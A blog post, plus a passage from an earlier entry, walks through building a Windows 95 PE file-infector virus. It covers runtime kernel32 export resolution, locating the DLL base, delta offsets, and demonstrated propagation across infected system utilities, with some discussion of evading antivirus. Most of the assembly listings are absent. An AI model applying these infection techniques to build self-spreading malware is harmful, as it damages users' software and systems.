Monday, 22 April 2019

Using Win95 kernel32.dll exports like a virus.

Welcome back! If this is your first visit to VeXation you may want to start by reading about the project, the development environment, the work in progress PE infector virus, or the previous post on delta offsets.

Continued Recap

At the end of the last post I completed `pijector`, an updated version of `minijector`. `pijector` is a PE executable file infector virus that can add its code to `.exe` files found in the same directory by adding a new section to the infected target. The injected code is self-contained and position independent.

There are two big shortcomings with `pijector` that prevent it from being a functional virus. In generation 1+:
  1. The way the virus code uses Win32 API functions will not work - a layer of indirection was broken and the first API function call will crash.
  2. The original entrypoint of the infected program is never called. The host program is effectively broken by the infection.
Today I'll describe how I worked through solving the Win32 API problems. With that out of the way I'll be in a good position to describe how I handled the original entrypoint problem in a future post.

Let's jump right in!

Understanding the problem

To understand why the Win32 API function invocations in the `pijector` virus code were broken I started by comparing the execution of generation 0 and generation 1 in a debugger. By carefully stepping through the first Win32 function call in the virus code in both generations and comparing the results I was able to build a picture of the problem.

Generation 0

I started by running the generation 0 `pijector.exe` in `td32` and switching to the CPU view.


The first Win32 API function the `pijector` virus code uses is `FindFirstFileA` exported from `C:\windows\system\kernel32.dll`.

In the source code it looks like:

In the disassembly view it looks like:

I was expecting that the call target would be a memory address somewhere in the `kernel32.dll` address space but the disassembly shows a target inside of `pijector`'s address space. Already the debugger is challenging my assumptions!

Seeing a call to an unknown address the first question I have is "what code is at `0x0040165C`"? One way to check that in `td32` is to "follow" the `call` by right clicking the line and choosing "Follow".


Now `td32` shows:

So the call takes the debugger to a `jmp` instruction to the address specified at `0x00403060`. Choosing "Data" in the `td32` menu followed by "Inspect" pops up a window that I used to quickly peek at what address the `jmp` will go to before following it.



Entering `[00403060]` as the expression (just like in the disassembly) shows the `dword` hex value:

That looks more like what I was expecting initially: an address in `kernel32.dll`. Following the `jmp [00403060]` instruction confirms the debugger does end up in the `kernel32.dll` address space.


Now the disassembly shows:

Very interesting! It's already pretty clear that there is some indirection between the virus code's `call`s to Win32 APIs and how control eventually ends up in the `kernel32.dll` address space.

Some of the addresses from this debugging experiment make more sense when compared with `tdump` output of both `pijector` and `kernel32.dll`.

First, the `jmp [00403060]` instruction is interesting because the `tdump` of `pijector` shows that `0x00403060` is in the `.idata` section.

I could tell this quickly because subtracting the base address of `pijector.exe` (`0x00400000`) from the address in the `jmp` reference (`0x00403060`) gives `0x00003060`. Since `0x00003060` is larger than `0x00003000` (which is the `RVA` of the `.idata` section) and smaller than `0x00004000` (which is the `RVA` of the `.reloc` section) the pointer that's used for the `jmp` target must be in `.idata`.
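The same range check can be written down as a minimal Python sketch. The section table below is an assumption: it lists only the three section RVAs mentioned in this post, and `section_for_address` is a hypothetical helper name rather than anything `tdump` provides.

```python
import bisect

IMAGE_BASE = 0x00400000

# (RVA, name) pairs sorted by RVA. Only sections named in this post are listed;
# a real tdump listing of pijector.exe has more entries, so gaps between these
# RVAs are attributed to the preceding section here.
SECTIONS = [
    (0x00001000, "CODE"),
    (0x00003000, ".idata"),
    (0x00004000, ".reloc"),
]

def section_for_address(address, image_base=IMAGE_BASE, sections=SECTIONS):
    """Return the name of the last listed section starting at or below address."""
    rva = address - image_base
    starts = [start for start, _ in sections]
    index = bisect.bisect_right(starts, rva) - 1
    if index < 0:
        raise ValueError("address is below the first section")
    return sections[index][1]

print(section_for_address(0x00403060))  # prints .idata
```

Feeding it the earlier call target `0x0040165C` returns `CODE`, which matches where the `jmp` stub was found.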

The `push BFF77A18` instruction that `jmp [00403060]` brings execution to is interesting when matched up to a `tdump` of `C:\windows\system\kernel32.dll`. (Isn't it handy that `tdump` works with `.dll`s too?)

In my `kernel32.dll`'s exports the `FindFirstFileA` function appears like so:

It has ordinal number 249 and the RVA `0x00007a18`. Adding the `kernel32.dll` base address `0xBFF70000` (more on finding that later) to the `FindFirstFileA` RVA gives `0xBFF77A18` - the argument from the `push` instruction!

What does it all mean? In summary:
  • `call FindFirstFileA` in generation 0 doesn't immediately call into `kernel32.dll` code.
  • instead it calls a local address that `jmp`s to a memory address specified in a pointer in the `.idata` section
  • the `jmp` takes execution into `kernel32.dll` where the exported `FindFirstFileA` function address gets pushed.
(note: Some of the above is specific to `tasm32`/`tlink32` but in general it works similarly for other assemblers/linkers).

Why so much indirection? One reason is that it lets the operating system loader populate the `.idata` section with pointers to imported `kernel32.dll` functions without having to update each individual place in the code sections that calls the imported functions.
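A toy Python model can make the benefit of the indirection concrete. This is only a sketch: memory is modelled as a dictionary, the two addresses are the ones seen in the debugger session above, and the function names are hypothetical.

```python
# Toy model: "memory" maps an address to the DWORD stored there.
IAT_SLOT = 0x00403060           # pointer slot in .idata (from the debugger session)
FIND_FIRST_FILE_A = 0xBFF77A18  # kernel32.dll address seen in generation 0

def loader_fill_imports(memory, resolved):
    """Model of the OS loader: write each resolved address into its slot."""
    for slot, address in resolved.items():
        memory[slot] = address

def follow_thunk(memory, slot):
    """Model of `jmp [slot]`: read the pointer and go wherever it says."""
    return memory[slot]

memory = {}
loader_fill_imports(memory, {IAT_SLOT: FIND_FIRST_FILE_A})

# Every call site shares the same stub and slot, so the loader only had to
# patch one DWORD no matter how many places call the function.
print(hex(follow_thunk(memory, IAT_SLOT)))  # prints 0xbff77a18
```

The flip side is that the stub is only as good as the slot it reads: if nothing writes the right pointer there, the `jmp` goes wherever the stale value points.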

(note: For a more rigorous explanation of these mechanisms see the "Peering inside the PE" MSDN article, particularly PE file Imports and PE File Exports)

Now that I had seen how the API function invocation works in generation 0 it was time to turn to the generation 1 code that crashes. Even without other resources it's possible to start to see the problem based on what's known from stepping through generation 0. The indirection I saw relied on pointers in an `.idata` section but the virus code only creates one new `.ireloc` section in the target; nothing carries forward or corrects for the missing `.idata` pointers. I used the same process of following an API call in `td32` with the generation 1 `calc.exe` to verify that idea.

Generation 1

Loading the infected generation 1 `calc.exe` in `td32` I saw the `call FindFirstFileA` Win32 API function call in the virus code a few instructions from the top, after the delta offset calculation. Similar to the Generation 0 disassembly the function call is a `call` to a memory address inside of `calc.exe`'s address space.


In generation 0 the disassembly was:

In generation 1 the disassembly is:

The difference in address (`0x0040165C` vs `0x0041365C`) is explained by the location of the code. In both cases the `call`'s relative target was `0x0000065C` but the location of the `call` itself differed.

In generation 0 the executable's base address was `0x00400000` and the `CODE` section's RVA was `0x00001000`. If I add the base address, the section RVA, and the relative target I get the generation 0 call target: `0x00400000` + `0x00001000` + `0x0000065C` = `0x0040165C`.

In generation 1 the executable's base address was still `0x00400000` but the `.ireloc` section that the `call` instruction is in has an RVA of `0x00013000`. If I add the base address, the section RVA, and the relative target again I get the generation 1 call target: `0x00400000` + `0x00013000` + `0x0000065C` = `0x0041365C`.
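The two sums are easy to double check with a few lines of Python. The function name is hypothetical; the numbers are the ones quoted above.

```python
def call_target(image_base, section_rva, relative_target):
    """Absolute address of a target given as an offset within a section."""
    return image_base + section_rva + relative_target

# Generation 0: the stub lives in the CODE section of pijector.exe.
gen0 = call_target(0x00400000, 0x00001000, 0x0000065C)
# Generation 1: the same code now lives in the .ireloc section of calc.exe.
gen1 = call_target(0x00400000, 0x00013000, 0x0000065C)

print(f"{gen0:#010x} {gen1:#010x}")  # prints 0x0040165c 0x0041365c
```

The only input that changes between generations is the section RVA, which is why the two targets differ by exactly `0x00012000`.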

So far execution has looked the same. Moving on to following the `call` will answer the question "What code is at `0x0041365C` in `calc.exe`?".


The disassembly shows a `jmp` instruction and its target (`[00403060]`) looks the same as in generation 0. So far so good.

Using the data inspector window again the address at `[00403060]` for the `jmp` target can be checked:

This time it shows a DWORD with the hex value:

This address looks totally wrong and it isn't the same target that Generation 0 jumped to. A smoking gun!

Letting the debugger follow the `jmp [CALC.00403060]` instruction sends it to la-la land.



The `jmp` causes an access violation and `calc.exe` crashes shortly after.

What to do?

It's clear the indirection used by generation 0 is a problem in generation 1+. The target of the `jmp` in the indirected `kernel32.dll` API call is read from an address that only made sense in generation 0. Similar to the problem of variable references across multiple sections that I tackled in the delta offset post the easiest solution is one of simplification: stop using the system loader to resolve `kernel32.dll` function references and stop relying on pointers in the `.idata` section (or equivalent for other assemblers).

Hard-coding

The earliest Win32 viruses avoided the system loader by hard-coding the addresses of the DLL functions they used. Imagine if instead of using `call FindFirstFileA` the `pijector` code used `call 0xBFF77A18`. As long as the `kernel32.dll` export for `FindFirstFileA` was _always_ at RVA `0x00007A18` and `kernel32.dll` was _always_ loaded at `0xBFF70000` this would be smooth sailing. Of course in practice all of these things change. Sometimes two matching Windows versions with different locales can have differences that would break these assumptions!

DIY

Another way to approach this problem (and the route I chose) is to have the virus code act like its own little linker/loader and find the addresses of the DLL functions required at runtime. This turns out to be a fun way to get some hands on experience playing with concepts from dynamic linking and operating system loaders.

In Windows dynamic linking is the domain of Dynamic Link Libraries (DLLs). The best part is that DLLs are implemented as PE executables! Having already written x86 ASM for manipulating PE metadata it's straightforward to get right into working with the `kernel32` DLL. That's also the reason that the trusty `tdump` tool has no problem with DLLs.

There's one other handy Windows trick that the virus code can use to do its runtime linking of external DLL functions: `kernel32.GetProcAddress`. This is an exported function from `kernel32.dll` that finds the address of an exported DLL function given its name and the DLL's base address.

That presents a nice short-cut. All the virus has to do is somehow find `kernel32.dll` and the address of the `GetProcAddress` function and from there it's easy to find any other required API addresses in a way that won't rely on the `.idata` section or any hardcoded offsets.

Exploring the solution

Since the task of finding win32 API function addresses from `kernel32.dll` at runtime is fairly self-contained I decided to start by experimenting with a stand-alone program separate from the PE infector virus code. Once I had a good solution I integrated it back into the virus code.

I decided to call the standalone program `apifind` since that's what it was going to do. At a high level the `apifind` code:

  1. Finds the `kernel32.dll`'s base address
  2. Finds `kernel32.dll`'s `IMAGE_EXPORT_DIRECTORY` structure
  3. Finds the index of `GetProcAddress` in `IMAGE_EXPORT_DIRECTORY.AddressOfNames`
  4. Uses the index to find the `GetProcAddress` ordinal in `IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals`.
  5. Uses the ordinal of `GetProcAddress` to find the export RVA in `IMAGE_EXPORT_DIRECTORY.AddressOfFunctions`
  6. Uses the discovered RVA of `GetProcAddress` to find other required APIs (e.g. `kernel32.FindFirstFileA`).

The code for `apifind` is available in the VeXation Github repo.

Where's kernel32.dll?

The first thing `apifind` needs to do is find the base address where `kernel32.dll` is loaded.

If you're familiar with more modern (Windows 2000/NT+) malware you might know of a trick for this based on chasing pointers from the Process Environment Block (PEB) to a list of loaded modules. On Windows 2000/NT/XP `kernel32.dll`'s location in this list was predictable and so offered a reliable way to find the base address dynamically. Since I'm targeting Windows 95 it's totally not applicable and another approach needs to be taken.

The "trick" I used instead is an old one. The first reference I saw was in 29A issue 04 from 1999 and an article by "LethalMind" called "RETRIEVING API'S ADRESSES". I suspect the trick predates this article as well. (Can you even call it a "trick"? On some level it's just The Way Things Work).

The core idea is to take advantage of the fact that it's `kernel32.dll` that calls every program's entrypoint when it is first started by the operating system. More specifically it's the `kernel32.dll`'s `CreateProcess` function that calls the program's entrypoint. Since the virus code replaces the infected program's original entrypoint I know that at the start of the virus code's execution the return address on the top of the stack will be pointing back into `kernel32.dll` somewhere.

Since `kernel32.dll` is a DLL and DLLs are portable executables I know what the start of `kernel32.dll` will look like: It should have a DOS header with the magic `MZ` bytes. Further, I know it will be section aligned in memory. All of that PE knowledge from previous articles really comes in handy! :-)

Using the return address from the stack the virus code can search backwards by the size of a section, looking for the DOS header magic bytes. When it finds a section aligned address that has the expected header it will be the base address of `kernel32.dll`.
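The backwards search can be simulated in Python against a fake memory image. This is a sketch under stated assumptions: the step size of `0x1000`, the return address `0xBFF88123`, and the `read_bytes` callback are all made up for illustration, and the assembly version reads memory directly rather than through a callback.

```python
STEP = 0x1000  # assumed alignment; the post only says "section aligned"

def find_image_base(read_bytes, return_address, step=STEP, max_steps=256):
    """Walk down from return_address in aligned steps until 'MZ' is found.

    read_bytes(address, size) is a hypothetical callback returning the bytes
    at a virtual address, standing in for a direct memory read.
    """
    candidate = return_address & ~(step - 1)  # round down to the alignment
    for _ in range(max_steps):
        if read_bytes(candidate, 2) == b"MZ":
            return candidate
        candidate -= step
    return None  # gave up without finding a header

# Simulated module: 'MZ' at the base, filler bytes everywhere else.
BASE = 0xBFF70000
image = bytearray(b"\xCC" * 0x20000)
image[0:2] = b"MZ"

def read_sim(address, size):
    offset = address - BASE
    return bytes(image[offset:offset + size])

print(hex(find_image_base(read_sim, 0xBFF88123)))  # prints 0xbff70000
```

Checking only two bytes is the simplest possible test. A sturdier variant could also follow the `e_lfanew` field at offset `0x3C` of the DOS header and confirm the `PE\0\0` signature before accepting a candidate.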

One disadvantage of this technique is that it only works if the virus code is executed before the host program code. If the real program is run first then the state of the stack will be unpredictable. I might have to revisit this strategy in the future if I mess around with more sophisticated entrypoint obfuscation but for now it will work reliably.

DLL Exports

Knowing the base address of where `kernel32.dll` is loaded lets me move on to `apifind`'s next challenge: finding the `GetProcAddress` function export in `kernel32.dll`.

The PE format is responsible for describing how a DLL exports a function for consumption by another program. The "Peering inside PE" article's section on "PE File Exports" was an invaluable resource for understanding PE exports.

To summarize, `kernel32.dll` has an `IMAGE_EXPORT_DIRECTORY` structure that is predictably located (its RVA and size are always stored in the first entry of the data directory array at the end of the PE optional header, just before the section table). Inside of the `IMAGE_EXPORT_DIRECTORY` structure are pointers to three arrays:

  1. `AddressOfFunctions` - which holds pointers to the RVA of each exported DLL function.
  2. `AddressOfNames` - which holds pointers to the null terminated name of each exported DLL function.
  3. `AddressOfNameOrdinals` - which holds the ordinal (think ID number?) of each exported DLL function.

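The `AddressOfNames` and `AddressOfNameOrdinals` arrays have the same number of entries and can be accessed in parallel. That is, if I can find the index of a specific function name in `AddressOfNames` I can use that index to find the ordinal in `AddressOfNameOrdinals` and then the function pointer in `AddressOfFunctions` using the ordinal. (`AddressOfFunctions` is indexed by ordinal rather than by name index, and it can hold more entries than the other two because some functions are exported by ordinal only.)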

The x86 assembly that accomplishes the above is a little bit gnarly but I did my best to comment it thoroughly. At a high level the code:

  1. Finds the `kernel32.dll` `IMAGE_EXPORT_DIRECTORY` structure.
  2. Loops through `AddressOfNames` to find the entry matching `"GetProcAddress\0"`
  3. Uses the matching offset in `AddressOfNames` to find the ordinal for `GetProcAddress` in `AddressOfNameOrdinals`
  4. Uses the ordinal for `GetProcAddress` to find the memory address of the exported function in `AddressOfFunctions`.
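The lookup steps above can be sketched in Python against a tiny synthetic export table. This is not the `apifind` assembly: the image layout and every RVA except `0x7A18` for `FindFirstFileA` are made up, and `resolve_export` is a hypothetical name. The structure layout follows the 40-byte `IMAGE_EXPORT_DIRECTORY` definition.

```python
import struct

def read_cstring(image, rva):
    """Read a null terminated ASCII string starting at rva."""
    end = image.index(b"\0", rva)
    return image[rva:end].decode("ascii")

def resolve_export(image, export_dir_rva, wanted):
    """Return the RVA of the export named wanted, or None if it is absent."""
    # Characteristics, TimeDateStamp, MajorVersion, MinorVersion, Name, Base,
    # NumberOfFunctions, NumberOfNames, then the three array RVAs.
    (_, _, _, _, _, _base, _n_funcs, n_names,
     funcs_rva, names_rva, ords_rva) = struct.unpack_from(
        "<IIHHIIIIIII", image, export_dir_rva)
    for i in range(n_names):
        (name_rva,) = struct.unpack_from("<I", image, names_rva + 4 * i)
        if read_cstring(image, name_rva) == wanted:
            # Same index into the WORD-sized ordinal array...
            (index,) = struct.unpack_from("<H", image, ords_rva + 2 * i)
            # ...and the ordinal indexes the DWORD-sized function array.
            (func_rva,) = struct.unpack_from("<I", image, funcs_rva + 4 * index)
            return func_rva
    return None

# Synthetic "DLL": three functions, two of them exported by name.
image = bytearray(0x200)
struct.pack_into("<IIHHIIIIIII", image, 0x10,
                 0, 0, 0, 0, 0, 1, 3, 2, 0x40, 0x60, 0x70)
struct.pack_into("<3I", image, 0x40, 0x1111, 0x7A18, 0x2222)  # AddressOfFunctions
struct.pack_into("<2I", image, 0x60, 0x100, 0x110)            # AddressOfNames
struct.pack_into("<2H", image, 0x70, 1, 2)                    # AddressOfNameOrdinals
for rva, name in ((0x100, b"FindFirstFileA\0"), (0x110, b"GetProcAddress\0")):
    image[rva:rva + len(name)] = name

rva = resolve_export(image, 0x10, "FindFirstFileA")
print(hex(0xBFF70000 + rva))  # prints 0xbff77a18
```

Adding the module base to the returned RVA gives the callable address, which is the same base plus RVA sum used earlier for `FindFirstFileA`.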

Once the address of the `GetProcAddress` function from `kernel32.dll` is known the fun can really begin.


Link it yourself

The virus code from `pijector` uses a handful of `kernel32.dll` functions (`FindFirstFileA`, `FindNextFileA`, `lstrcpy`, `CreateFileA`, etc). Using `GetProcAddress` makes for an easy way to find the address of each without needing to do as much work spelunking the `kernel32.dll` export table.

To find the address of `FindFirstFileA` the `apifind.asm` code uses the discovered `GetProcAddress` address (held in a var `GetProcAddress`):

For every function the virus wants to "link" it needs two things:

  1. The name of the API in a null terminated string (e.g. `szFindFirstFileA` above holds "FindFirstFileA\0").
  2. A four byte var to hold the function pointer (e.g. `FindFirstFileA` above)

I chose the most naive solution for the first part and included the literal strings in the virus code. That's an obvious tell for AV since the virus code will now have function name strings like `"GetProcAddress\0"` and `"FindFirstFileA\0"` embedded in each infected file that aren't present in the file's PE imports. There are plenty of tricks for working around this but for now I'm ignoring AV "stealth".

One of the other challenges I encountered was finding a way to use raw function pointers with TASM while still having it handle the `stdcall` calling convention and argument checking. The solution to this was adding explicit `PROCDESC` types to reference for each `call` of a raw pointer.

You might notice that weird `call` syntax in the fragment above. It relies on a `procGetProcAddress` `PROCDESC`. In brief `PROCDESC` is a bit of TASM syntax that lets me give the assembler a description of the function I'm calling so it can use the correct calling convention and check the arguments. For `GetProcAddress` the `procGetProcAddress` `PROCDESC` looks like:

It indicates that the `stdcall` calling convention should be used and there are two `DWORD` arguments: the base address of a DLL and a pointer to the name of the exported function to lookup.

The `apifind.asm` code uses a similar `PROCDESC` to invoke the `kernel32.FindFirstFileA` function by the address found with `GetProcAddress`:

End-to-end this is certainly more verbose than the simple `call <api>` that normal programs can get away with but virus code is "special" ;-D

Convenient Macros

Tackling the clunkiness was my next task. I decided it made sense to write some quick macros that would make it easier to find required API addresses and invoke them. Borland's Macro language is pretty powerful and I was able to get some decent results quickly even as a complete assembly language programming novice.

To make it easy to see how the macros replaced the initial code I made a separate `apifind2` project that took the code from `apifind` and introduced some new macros.

I created four macros, each addressing one of the four parts involved in the process of using an exported DLL function resolved by the virus at runtime:
  1. Making a name variable and a pointer variable for each API.
  2. Describing the API procedure and its arguments.
  3. Populating the pointer variable by finding the name.
  4. Invoking the described procedure using the pointer.
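To show how the four parts fit together, here is a toy Python model. It is not TASM and not the macros from the repo: the class, the method names (borrowed from the macro names introduced below), and the fake `GetProcAddress` are all assumptions made for illustration.

```python
class RuntimeLinker:
    """Toy model of the four roles; function pointers are Python callables."""

    def __init__(self, module_base, get_proc_address):
        self.module_base = module_base
        self.names = {}                                       # part 1: name per API
        self.pointers = {"GetProcAddress": get_proc_address}  # part 1: pointer per API
        self.arg_counts = {"GetProcAddress": 2}               # part 2: description

    def required_api(self, api):
        self.names[api] = api + "\0"
        self.pointers.setdefault(api, None)

    def desc_runtime_api(self, api, arg_count):
        self.arg_counts[api] = arg_count

    def call_runtime_api(self, api, *args):
        # Part 4: check the arguments against the description, then call.
        if len(args) != self.arg_counts[api]:
            raise TypeError(f"{api} expects {self.arg_counts[api]} arguments")
        pointer = self.pointers[api]
        if pointer is None:
            raise RuntimeError(f"{api} has not been linked")
        return pointer(*args)

    def link_api(self, api):
        # Part 3: resolve the name through GetProcAddress and store the result.
        self.pointers[api] = self.call_runtime_api(
            "GetProcAddress", self.module_base, self.names[api])

# Stand-ins for kernel32.dll so the sketch runs anywhere.
def fake_find_first_file(pattern, find_data):
    return f"searching {pattern}"

FAKE_EXPORTS = {"FindFirstFileA\0": fake_find_first_file}

def fake_get_proc_address(module_base, name):
    return FAKE_EXPORTS.get(name)

linker = RuntimeLinker(0xBFF70000, fake_get_proc_address)
linker.required_api("FindFirstFileA")
linker.desc_runtime_api("FindFirstFileA", 2)
linker.link_api("FindFirstFileA")
print(linker.call_runtime_api("FindFirstFileA", "*.exe", {}))  # prints searching *.exe
```

Routing the link step through the same call helper means `GetProcAddress` gets the same argument checking as every other runtime API.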

REQUIRED_API

The macro I wrote for declaring a name variable and a pointer variable for each API is called `REQUIRED_API`:


DESC_RUNTIME_API

The macro I wrote for generating a `PROCDESC` for each API is called `DESC_RUNTIME_API`:


LINK_API

The macro I wrote to find the `kernel32.dll` function address for a `REQUIRED_API` is called `LINK_API`:


CALL_RUNTIME_API

The last macro is the one used to invoke functions previously described with `DESC_RUNTIME_API` and declared with `REQUIRED_API`. The `LINK_API` macro uses `CALL_RUNTIME_API` to call `GetProcAddress`.


Next Steps

With `apifind` and `apifind2` I have an effective way to find `kernel32.dll` and its exported functions at runtime without hard-coding anything. The next step is to take this code and integrate it back into the `pijector` virus code.

For this I created a project called `apisafejector`. Like the other projects so far its code is available in the VeXation repo.

I was able to use the code/macros from `apifind2` for `apisafejector` as-is with one small exception: all of the variable references needed to be adjusted to use the delta offset.

For each of the Win32 APIs used by `pijector` the `apisafejector` code needed:
  1. a `DESC_RUNTIME_API` line. See `apisafejector.inc` for these.
  2. a `REQUIRED_API` line. See the bottom of `apisafejector.asm` for these.
  3. a `LINK_API` line. See the `@@linkapis` label in `apisafejector.asm`.

After these three pieces were in place I updated each of the existing `call <win32 api function>` instructions to use `CALL_RUNTIME_API <win32 api function>, <args>` instead.

A virus at last!

It's finally time to see if the virus code can propagate itself beyond the first generation. To test the updated `apisafejector` virus I started by infecting `calc.exe` by using the `Makefile`'s run target with a clean build (without debug symbols):



This launched `apisafejector.exe` in `td32` (remember it's a necessary hack to run the generation 0 executable this way or it will crash writing to a read-only section). Hitting `F9` let it complete its work infecting the only other `.exe` in the directory that can be opened for writing, `calc.exe`. The `apisafejector.exe` process terminated normally once it was complete.


I verified `calc.exe` was infected by checking the `tdump calc.exe` output to see that the entrypoint was updated and that there was a new `.ireloc` section added.

Before `tdump calc.exe` showed:

After:

Since the virus only infects `*.exe` files in the same directory it's easy to make a little test lab to see if the first generation `calc.exe` infection is working. I simply made a new directory, copied in the infected `calc.exe` and then copied in a clean `cdplayer.exe` from the Windows directory.

Running `calc.exe` in this directory appears to do nothing: since the virus code doesn't call the original `calc.exe` entrypoint yet the program immediately exits after infecting `cdplayer.exe` and without showing any actual calculator GUI.

Checking the `tdump` output from `cdplayer.exe` shows that while it seemed like `calc.exe` exited without doing anything the infection did work! The entrypoint of `cdplayer.exe` was changed and a new `.ireloc` section was added. The generation 1 `calc.exe` managed to successfully create a generation 2 infection in `cdplayer.exe`!

Before running the infected `calc.exe` `tdump cdplayer.exe` showed:

After it showed:

To ensure this wasn't a fluke I tried making one more test directory to see if the generation 2 infection in `cdplayer.exe` could propagate.

Running the infected `cdplayer.exe` gave the same results as `calc.exe`. The program exited immediately and the `tdump` output for the `pbrush.exe` program shows the tell-tale signs of infection. Generation 2 successfully propagated to generation 3 in `pbrush.exe`!

Before running `cdplayer.exe` `tdump pbrush.exe` showed:

After it showed:

I have to admit I took particular joy in corrupting my favourite Windows utilities one by one.

Conclusion

With `apisafejector` I've arrived at a from-scratch Borland Turbo Assembler PE infector virus that actually propagates itself. The last remaining challenge before a rough prototype of the core virus is complete is finding a way to invoke the infected program's original code. If all of the infected programs appear to be broken then the virus certainly won't evade detection for long.

I hope presenting my progress and general piece-wise development approach is interesting! I've only scratched the surface of what's possible and implemented the most basic techniques to keep making forward progress. I'm excited to gradually improve on the skeleton established so far. If nothing else this project has emphasized for me the difference between knowing how to do something in theory and actually doing it in practice :-)

In general it seems like I manage ~one post a month so I hope to see you in May for the next VeXation installment. As always, I would love to hear feedback about this project. Feel free to drop me a line on twitter (@cpu) or by email (daniel@binaryparadox.net).

Monday, 11 March 2019

A VXer's Best Friend: the Delta Offset

Welcome back! If this is your first visit to VeXation you may want to start by reading about the project, the development environment, or the work in progress PE infector virus I'm extending.

Recap

At the end of the last post I completed minijector, a Windows 95 PE executable file infector virus that can add its code to .exe files found in the same directory by adding a new section to the infected target. There are a handful of shortcomings that prevent minijector from being a real functional virus. To recap, the virus code quickly falls apart for generations after 0:

  1. The virus code relies on a data section that isn't copied into the infected program. Variable references will all be broken.
  2. The way the virus code uses Win32 API functions will not work - a layer of indirection was broken and the first API function call will crash.
  3. The virus code is inert. The entrypoints of infected programs aren't being updated.

Today I'll describe the approach I took to fix the first of these three problems: making the virus self-contained and position independent.

Code and Data

A big problem with Minijector is that its CODE section refers to variables in a separate DATA section. When Minijector's code is copied into generation 1+ all of the variables are left behind and the references will be invalid!

I found it helpful to get an intuition for this using tdump on the minijector.exe executable.


Here I can see there's both a CODE and a DATA section present in the object table and that each of those sections has a non-zero PhysSize.

(Side note: The names of these sections are a give-away that I used Borland Turbo Assembler. Other assemblers will choose different names. For example, calc.exe has a .text section instead of CODE).

Turning to a tdump of a calc.exe instance infected by minijector.exe I can see there's just one new section above and beyond the original calc.exe sections, .ireloc:


Since the virus code was using both sections (CODE and DATA) in the original minijector.exe and there's only one new section in calc.exe (.ireloc) it's easy to understand there is a mismatch that needs to be addressed.

Code is Data is Code

It's tempting to think about fixing this problem by duplicating the process generation 0 uses to copy its CODE section to the injected .ireloc section. Overall this approach seemed like the wrong solution. It will be more complex managing injecting multiple sections and as mentioned in the previous post adding a new section is already pretty clumsy from an AV evasion perspective. Continuing to pile new sections into a target isn't very appealing.

The route I decided to follow was to remove the DATA section entirely and have the virus maintain and update variables inside of its existing CODE section. I started by copying the minijector folder from the VeXation repo to create a pijector folder (position independent (in)jector, get it?). Updating all of the old "minijector" references in the Makefile, .inc, .def, and .asm files was enough to get started on a position independent version of minijector.

From an Assembly programming standpoint there's only one change that needs to be made. The old .data section from minijector.asm is moved inside of the .code section of pijector.asm. Done!

For unsatisfying and vague reasons I found I couldn't delete the .data section outright or tasm32 and tlink32 would wig out and create a generation 0 binary that would crash immediately. Rather than spend time figuring out why I decided to hack around it by adding a tiny .data section that isn't used for anything:


With the old .data section moved to .code and replaced with an empty .data section the assembled pijector.exe should have a non-empty CODE section and an empty DATA section on disk. A quick tdump shows that this worked out as expected:


Unlike before the PhysSize of the DATA section is now 00000000.

The trap of position dependence

Consolidating to one section is a step in the right direction but it's only a half-solution for making sure the virus code from generation 0 still works when run from a new location in generation 1+.

I found it was easier to understand the remaining problem by poking at it with some tools. Running td32 on an old minijector.exe build without debug symbols makes it easy to see how variable references in the code end up looking in the assembled executable.

There's an example of variables being used right at the beginning of the minijector.asm code that shows the problem in concrete terms:


Here eax and ebx are being used as arguments to FindFirstFileA. Both arguments are a pointer to a memory address. In this case pointers to the memory addresses of the variables infectFilter and findData respectively. After calling FindFirstFileA the result in the eax register is saved in the findHandle variable.

In td32 the debugger's view of this code's disassembly looks a little bit different. Most importantly the "offset infectFilter", "offset findData" and "[findHandle]" instances have been replaced with memory addresses:


The addresses of the variables are offsets from where the OS loaded minijector.exe in memory, the base address.

In this case the base address is 0x00400000 and the infectFilter variable is at an offset of 0x14E6, the findData variable is at an offset of 0x13A8 and the findHandle variable is at an offset of 0x13A4.

(Side Note: You can also see the stdcall calling convention in action here. The assembler helpfully replaced the arguments to the call instruction with push operations in the correct reversed order)

Debugging pijector.exe to see variable reference offsets

The "infectFilter", "findData" and "findHandle" offsets work correctly in generation 0 because the assembler and linker calculated them knowing where the CODE section will be relative to the loaded base address.

The same offsets will be a complete disaster in later generations because the virus code from the generation 0 CODE section won't be located in the expected place anymore (the first section in the executable). Instead it will be running from the .ireloc section that gets appended at the end of infected executables.

For example if the findfirst code from above were injected into calc.exe the offset for the infectFilter variable (0x14E6) would be pointing somewhere inside calc.exe's original code in the .text section and not at the location of the infection filter variable in the virus code. That's obviously not going to work so what can be done?

Enter, the Δ offset

The solution to this problem is a well known trick in the VX and AV community called "the delta offset".

The core idea is to figure out at runtime the difference in location between where the virus code was originally being run in generation 0, and the location where the virus code is currently running in an infected executable. The difference in location is the delta offset and by adding it to all of the original variable offsets in the virus code they will remain correct even when the code is moved to a new location.

Calculating the delta offset

There are a handful of different ways to compute a delta offset but the standard textbook approach is to exploit the relative nature of "call" and its effect on the stack. Here's an example:


How does this magic incantation work? Well, there's a lot going on in just ~4 lines of assembly so let's break it down.

The first "call" is to a locally scoped label ("@@delta") for the address immediately after the "call" instruction. When the "call" instruction is executed the return address (the address of the instruction after "call") will be pushed onto the top of the stack as a side-effect of how "call" works.

In this case however we don't care about returning from a procedure call, we just want to know where this code is executing from in memory. A "pop" of the top of the stack into "ebp" puts the return address from the "call" instruction that was just executed into "ebp" (recall that the return address will be the address of the instruction after the "call", the "pop ebp" instruction).

Now comes the last trick: subtracting the original label offset ("offset @@delta") from the address of the "pop ebp" instruction (currently in "ebp"). This gives the difference between where the "pop ebp" instruction would have been in generation 0 and wherever the "pop ebp" instruction happens to be now: the delta offset!
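The arithmetic behind the trick fits in a few lines of Python. The addresses below are hypothetical, chosen so the code sits at RVA `0x1000` in generation 0 and RVA `0x13000` in an infected host, and the helper names are made up.

```python
MASK32 = 0xFFFFFFFF  # registers are 32 bits wide, so arithmetic wraps around

def delta_offset(runtime_label_address, linktime_label_address):
    """Value left in ebp after subtracting `offset @@delta` from it."""
    return (runtime_label_address - linktime_label_address) & MASK32

def relocate(linktime_address, delta):
    """Where a variable really is, given its assembled address and the delta."""
    return (linktime_address + delta) & MASK32

LINKTIME_LABEL = 0x00401005  # hypothetical assembled address of the `pop ebp`

# Generation 0 runs where the linker expected, so the delta is zero.
print(hex(delta_offset(0x00401005, LINKTIME_LABEL)))  # prints 0x0

# In an infected host the same instruction sits somewhere else.
delta = delta_offset(0x00413005, LINKTIME_LABEL)
print(hex(delta))                        # prints 0x12000
print(hex(relocate(0x004013A4, delta)))  # prints 0x4133a4
```

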